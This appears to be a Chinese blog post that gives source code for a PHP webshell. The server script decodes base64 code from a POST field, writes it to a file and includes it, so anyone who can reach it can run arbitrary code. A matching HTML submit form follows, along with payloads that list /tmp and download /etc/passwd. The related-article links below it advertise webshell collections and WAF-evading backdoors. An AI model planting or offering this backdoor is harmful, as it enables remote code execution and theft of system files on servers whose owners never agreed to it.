使用include实现php一句话

最新推荐文章于 2023-05-08 19:11:38 发布
最新推荐文章于 2023-05-08 19:11:38 发布
阅读量844 收藏 1
点赞数
分类专栏: 编程 web hacking
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eT48_sec/article/details/42424177
版权

我是菜牛各位看官轻喷。

PHP一句话主要实现的是,动态执行PHP代码。
PHP小马主要实现的是,文件上传。
PHP大马主要实现的是,提权。


include 语句包含并运行指定文件。 

<?php
//服务端
if(!empty($_POST['code'])){
$code=trim($_POST['code']);

$handle=fopen('cmd.txt','w') or die('创建文件失败');
fputs($handle,base64_decode($code)) or die('写入文件失败');

fclose($handle);
if(file_exists('cmd.txt')){
include 'cmd.txt';
}
}
?>

<html>
     <head><title>简易一句话客户端</title></head>
     <body>
         <form method='post' action='test2.php' name='fcode' target='_blank' 
             <textarea rows='15' cols='30' name='code'>
             </textarea><br />
             <input type='submit' value='submit' name='submit' />
             <input type='reset' value='reset' name='reset' />
         </form>
      </body>
</html>

最后附上两个shellcode,一个用于目录遍历,一个用于文件下载。 

<?php
//目录遍历
$d = dir("/tmp");
echo "Path: " . $d->path . "<br />";
while (false !== ($entry = $d->read())) {
   echo $entry."<br />";
}
$d->close();
?>

<?php
//文件下载
$file = '/etc/passwd';
if (file_exists($file)) {
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($file));
    header('Content-Length: ' . filesize($file));
    ob_clean();
    flush();
    readfile($file);
    exit;
}
?>


eT48_Sec
关注
专栏目录
PHP include任意文件或URL介绍
10-26
官方文档中的这句话隐含地指出,include操作可以处理任意类型的文件,但要注意,非PHP文件内容将按纯文本处理。 除此之外,自PHP 4.3.0版本之后,include的目标文件还可以是一个URL,当然,前提是PHP配置中将allow_...
php一句话调用方式,使用include实现php一句话
weixin_30209891的博客
03-29 420
我是菜牛各位看官轻喷。PHP一句话主要实现的是,动态执行PHP代码。PHP小马主要实现的是,文件上传。PHP大马主要实现的是,提权。include 语句包含并运行指定文件。//服务端if(!empty($_POST['code'])){$code=trim($_POST['code']);$handle=fopen('cmd.txt','w') or die('创建文件失败');fputs($ha...
PHP一句话木马集合
闵行小鱼塘
05-21 1万+
whoam1(QQ:2069698797)大佬早些年做的PHP一句话木马集合,在此记录下
WEB攻防-PHP特性-学以致用
luffysec的博客
01-11 4549
学习笔记-WEB攻防-PHP特性-学以致用
i春秋 Misc Web 爆破-1
最新发布
Welcome To Myon'Blog !
05-08 1538
PHP常用函数,PHP超全局变量,正则匹配,正则表达式,代码审计
引入flag.php文件,flag在php中咋解决
weixin_33982355的博客
03-10 2595
该楼层疑似违规已被系统折叠隐藏此楼查看此楼include("flag.php");highlight_file(__FILE__);class FileHandler {protected $op;protected $filename;protected $content;function __construct() {$op = "1";$filename = "/tmp/tmpfile";...
meeidol-luo#WebShell#另类PHP一句话小马1
07-25
另类PHP一句话小马利用了include可以把任何文件当php来解释的特性, 当我们上传一个文件的时候,会在服务器上生成一个临时文件,而$_FILES这个变量里
ECSHOP模版系统Assign和Include模版标签使用介绍
09-28
例如,{include file="header.tpl"},这句话表示在当前模板中包含了一个名为“header.tpl”的模板文件。 “Include”标签还具备其他一些功能,包括指定本地参数和控制输出。如果在“Include”标签中设置了“assign...
学习discuz php 引入文件的方法DISCUZ_ROOT
12-18
先说明一下本篇文章中假定common.inc.php文件的绝对路径就是F:\webroot\bbs\include\common.inc.php这句话包含在discuz的 include/common.inc.php 里面,首先我们来看看DISCUZ_ROOT这个常量的值:F:\webroot\bbs\接...
PHP API接口和返回的版本
10-11
在 Java 客户端中,我们使用了接口来描述远程方法,之后我们通过 useService 方法返回一个远程代理对象,该对象实现了我们定义的接口,之后我们就可以直接调用远程方法 helloWorld 了。如果你比较细心的话,你还会...
2019最新过狗过,云锁,360等WAF的PHP免杀大马
03-20
2019最新过狗过,云锁,360等WAF的PHP免杀大马等主流防护软件,2019最新大马下载PHP
PHP入侵+提权拿服务器.rar
12-03
PHP入侵+提权拿服务器.rarPHP入侵+提权拿服务器.rar
CTFshow刷题日记-WEB-PHP特性(上篇89-115)
Love&Share
09-05 3517
Part1 有关 intval() 函数的绕过技巧 web89 clude("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 能被intval
include waf.php,[宜配屋]听图阁
weixin_29602351的博客
03-10 129
前言之前在Webshell查杀的新思路中留了一个坑 ️,当时没有找到具体找到全部变量的方法,后来通过学习找到了个打印全部量的方法,并再次学习了下PHP webshell绕过WAF的方法,以此来验证下此方法是否合理。如有错误,还请指出,不胜感激! :turtle:拜在那篇文章中我突然想到一种检测webshell的方法,就是首先获取到当前文件中的所有变量(不明白的可以先去看下之前的文章),然后再根据正...
BugkuCTF-WEB-本地包含
Jaychouzzk
11-15 539
题目提示,需要将flag.php包含进去才可以得到flag 百度了一下$_REQUEST函数,发现易存在sql漏洞和变量漏洞覆盖 第二句话要获得hello的值,由于hello为’hello’,所以无论在url栏中对hello赋任何值,都会全盘接受,其中var_dump()是将变量a打印到界面中,在根据eval函数的特性(计算后面括号中的表达式) SO——   (1)a变量由$_REQU...
PHP渗透测试题目笔记
Zeker62的博客
02-10 5607
最简单反序列化漏洞陷阱题 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3题目解析攻防世界:PHP2 最简单反序列化漏洞 简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
深入浅出玩转php一句话(含过waf新姿势)
热门推荐
wjy397的专栏
01-10 1万+
本帖最后由 sucppVK 于 2017-1-9 14:39 编辑 一、前言 本文原创作者:XXX,本文属i春秋原创奖励计划,未经许可禁止转载! 各个论坛出了不少过waf的一句话 可笔者见还是有不少小白没有理解一句话(只知道是拿来链接菜刀) 今天打算做一篇面向初学者的教程,总结知识点,抛砖引玉。 让小白从彻底理解马的含义,到打造属于自己过waf的马。 ----
php一句话木马连菜刀,如何基于菜刀PHP一句话实现单个文件批量上传?
weixin_35741494的博客
03-09 1953
本文原创作者:安全小飞侠0x00 前言很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀的php一句话为例来分析一下如何实现这类需求。0x01 原理分析首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。下面是最常见...
VC++ include 使用指南:理解#include路径
本文将详细介绍在VC(Visual C++)环境下`#include`指令的使用方法。 1. **系统包含路径**: 在VC环境下,系统通常已经设置了包含路径,可以在“Tools” -> “Options” -> “Directories”下的“Includ Files”...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值